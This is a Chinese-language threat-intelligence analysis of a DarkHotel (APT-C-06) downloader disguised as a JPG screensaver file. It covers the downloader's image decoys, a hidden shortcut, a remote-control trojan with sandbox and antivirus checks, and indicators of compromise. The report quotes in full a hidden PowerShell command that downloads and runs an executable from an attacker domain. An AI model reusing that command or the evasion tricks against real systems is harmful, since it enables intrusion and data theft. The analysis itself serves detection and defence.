DarkHotel定向攻擊樣本分析
Author:360天眼實驗室
0x00 引言
人在做,天在看。
360天眼實驗室追日團隊持續發現與跟蹤APT活動,相關的樣本、IP、域名等資料只要一出現就會立即進入我們的視線。5月10日VirusTotal上有人提交了一個樣本,安博士標記為DarkHotel相關。
DarkHotel團伙在2014年被卡巴斯基做過一次暴光,但直到最近還一直非常活躍,下面我們來對VT上的這個樣本做個簡單的分析。
0x01 樣本分析
基本資訊
樣本MD5:43f3b56c1c01b007c35197c703e4d6a6
樣本大小:131,072 Bytes
編譯時間:2015-10-15 22:52:30
檔名:DSC3013.JPG.scr
樣本截圖:
詳細行為
總體來說,樣本的功能很簡單,是一個典型的下載器誘餌。得到點選執行機會以後,樣本會從自身釋放3個圖片和1個快捷方式到TEMP目錄下;呼叫mspaint開啟3個圖片中的一個檔案,執行TEMP目錄下的快捷方式,快捷方式執行起來後會啟動powershell從http://all-microsoft-control.com/kd/f.exe下載PE並執行。
樣本首先會獲取TEMP目錄的路徑:
然後拼出4個路徑:
%temp%\DSC3013.JPG
%temp%\DSC3014.JPG
%temp%\DSC3015.JPG
%temp%\desktop.lnk
會從自身檔案的0x406b20的偏移處讀取0xead位元組的資料寫入到DSC3013.JPG、DSC3014.JPG和DSC3015.JPG檔案中;
資料為JPG圖片格式檔案,如圖:
圖片是純白色背景的JPG檔案,因為這種純色檔案透過JPG格式的壓縮後佔用的空間比較小。
資料同時寫入到剛才建立的3個隱藏的圖片檔案中,CreateFile的倒數第二個引數為2,表示該檔案是隱藏的狀態。
之後會呼叫mspaint.exe開啟DSC3013.jpg檔案,因為木馬樣本的檔名為DSC3013.JPG.scr,而且木馬樣本也是圖片圖示,所以用圖片開啟DSC3013.jpg檔案迷惑受害者:
接下來會在同目錄下再建立3個不隱藏的圖片檔案,並寫入同樣的資料:
然後建立隱藏的desktop.lnk檔案,把從檔案的0x406088 處讀取到的資料寫入到該檔案,並透過ShellExecute執行起來該快捷方式檔案:
檔案的0x406088偏移處是一個快捷方式格式的檔案,如圖能看到快捷方式的引數資訊:
把該塊資料段儲存成LNK檔案,命令列引數如下:
快捷方式指向的目標為:
%COMSPEC% /c powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://all-microsoft-control.com/kd/f.exe ','%temp%\~$ER96F.doc')&&echo f|xcopy %temp%\~$ER96F.doc %temp%\dwm.exe /H /Y&&%temp%\dwm.exe
所以快捷方式被執行起來後,會呼叫powershell從http://all-microsoft-control.com/kd/f.exe下載到%temp%\~$ER96F.doc,並把該檔案重新命名為dwm.exe後,執行起來。
最後會在同目錄下生成desktop.bat,並把“del *.scr\r\ndel *.bat”程式碼寫入進去,試圖刪除掉該目錄下所有的scr和bat字尾的檔案,讓目錄看起來只有正常的圖片檔案。
遠控木馬
目前透過URL下載的dwm.exe已經失效,但從360公司海量的樣本庫中找到了這個檔案不難:
分析顯示此dwm.exe是一個使用OpenSSL協議的遠控木馬:
樣本的字串加密儲存樣本里的,關鍵API都用解密後的字串動態載入:.
sub_497036是字串的解密函式:
樣本會檢測虛擬機器、沙箱和殺軟:
卡巴
沙箱檢測:
檢測360的產品:
檢測金山和baidu的安全產品:
檢測透過後,會連線C&C地址的80埠,走SSL通訊協議,把請求的資料包加密放到URL裡,然後進行通訊:
C&C域名為:view-drama-online.com
相關分析
使用高階賬號查詢360威脅情報中心,樣本涉及的域名 all-microsoft-control.com 其實早就被內部分析團隊打上了相關的標籤,而外部的大部分威脅情報平臺對此域名沒有做什麼惡意性標記:
域名註冊於2015年7月26日,在卡巴斯基在2014年的揭露報告以後註冊,由此可見APT團伙在被公開以後並不會停止活動,根據我們的分析甚至手法上都沒有大的改變。
雖然目前我們從那個域名已經下載不到 .EXE 的進一步惡意程式碼,但威脅情報中心包含的同源樣本沙箱日誌記錄告訴我們還有多個歷史下載路徑:
事實上,利用360威脅情報中心的基礎資料,從一個域名、樣本出發我們可以把DarkHotel團伙相關的很大一部分所使用的工具和網路基礎設施資訊關聯出來,在此基礎上分析其活動歷史,甚至最終定位到幕後的來源。
關聯組織
360公司內部的長期跟蹤了代號為APT-C-06的境外APT組織,其主要目標除了中國,還有其他國家,主要目的是竊取敏感資料資訊,DarkHotel的活動可以視為APT-C-06組織一系列活動之一。在針對中國地區的攻擊中,該組織主要針對政府、科研領域進行攻擊,且非常專注於某特定領域,相關攻擊行動最早可以追溯到2007年,至今還非常活躍。
該組織多次利用0day漏洞發動攻擊,進一步使用的惡意程式碼非常複雜,相關功能模組達到數十種,涉及惡意程式碼數量超過200個。該組織主要針對Windows系統進行攻擊,近期還會對基於Android系統的移動裝置進行攻擊。另外該組織進行載荷投遞的方式除了傳統的魚叉郵件和水坑式攻擊等常見手法,還主要基於另一種特殊的攻擊手法。
我們將APT-C-06組織和其他APT組織的TTPs(戰術、技術與步驟)進行了對比分析,該組織無論是整體實力還是威脅等級在現有的APT組織中都是屬於很高的級別。從我們掌握的證據來看該組織有可能是由境外政府支援的駭客團體或情報機構。
0x02 IOC
| 型別 | 值 |
|---|---|
| Downloader Domain | all-microsoft-control.com |
| C&C Domain | view-drama-online.com |
相關文章
- CVE-2014-6352漏洞及定向攻擊樣本分析
- 對某單位的 APT 攻擊樣本分析APT
- DDoS攻擊工具HOIC分析
- 利用Office宏及Powershell的針對性攻擊樣本分析
- 利用Office巨集及Powershell的針對性攻擊樣本分析
- 隱秘的攻擊形式:無檔案攻擊型別分析型別
- 重新整理 .net core 實踐篇————重定向攻擊[三十九]
- Hundred Finance 攻擊事件分析NaN事件
- TARA攻擊樹分析方法論
- 一起涉及多個DDoS殭屍網路樣本的攻擊事件追蹤事件
- WMI 的攻擊,防禦與取證分析技術之攻擊篇
- 【漏洞分析】ReflectionToken BEVO代幣攻擊事件分析事件
- SQL隱碼攻擊關聯分析SQL
- Hacking Team攻擊程式碼分析
- APT34攻擊全本分析APT
- 基於TCP反射DDoS攻擊分析TCP反射
- 黑色產業鏈分析丨DDOS攻擊產業
- 谷歌發現的 iPhone 攻擊者同樣也在攻擊 Android 和 Windows 系統谷歌iPhoneAndroidWindows
- 三星Android OS加密漏洞分析:IV重用攻擊與降級攻擊Android加密
- 宏碁再次遭遇勒索病毒攻擊、谷歌分析8000萬個勒索軟體樣本|10月15日全球網路安全熱點谷歌
- Redis漏洞攻擊植入木馬逆向分析Redis
- SolarWinds供應鏈攻擊事件分析事件
- 攻擊面分析及應對實踐
- 跨域攻擊分析和防禦(中)跨域
- PHP中該怎樣防止SQL隱碼攻擊?PHPSQL
- web攻擊日誌分析之新手指南Web
- Novter無檔案攻擊分析報告
- Volatility:分析MS10-061攻擊
- 特斯拉攻擊案例解讀:硬體逆向分析
- ROVNIX攻擊平臺分析 -利用WordPress平臺傳播的多外掛攻擊平臺
- XXE攻擊攻擊原理是什麼?如何防禦XXE攻擊?
- 怎樣在網站中防止SQL隱碼攻擊?網站SQL
- 淺談DDOS攻擊攻擊與防禦
- 某EXCEL漏洞樣本shellcode分析Excel
- APT攻擊APT
- 攻擊性
- 一例針對中國政府機構的準APT攻擊中所使用的樣本分析APT
- 分析HTTP請求以降低HTTP走私攻擊HTTP資料接收不同步攻擊的風險HTTP